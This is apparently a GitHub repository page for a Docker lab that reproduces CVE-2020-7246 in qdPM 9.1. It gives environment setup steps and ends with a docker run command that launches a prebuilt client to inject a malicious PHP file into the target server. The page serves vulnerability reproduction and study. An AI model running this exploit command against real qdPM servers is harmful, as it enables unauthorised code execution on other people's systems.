Skip to content

Latest commit

 

History

History

CVE-2020-7246

Folders and files

NameName
Last commit message
Last commit date

parent directory

..
 
 
 
 
 
 
 
 
 
 

CVE-2020-7246

About

PoC / Exploit

Environment used

  • Ubuntu 18.04 LTS
  • qdPM 9.1

Requirements

  • docker
  • docker-compose

Reproduction

Commands to build the environment

docker-compose up 
  • Browse into http://SERVER_IP:8000/ and press "Database Config"
  • In Database Config change the Database host to cve20207246_db_1 DB username to teste, DB password to teste, then press Install Database
  • Choose a password for the admin account and them press save
  • Press Login As Administrator
  • In the login menu use [email protected] as username and the password is the one used above
  • After login press Add User and change the following:
  • Press save

In the terminal execute the following command to inject malicious php file

docker run --rm simaofsilva/cve-2020-7246-client -url <SERVER_IP>:8000 -u [email protected] -p teste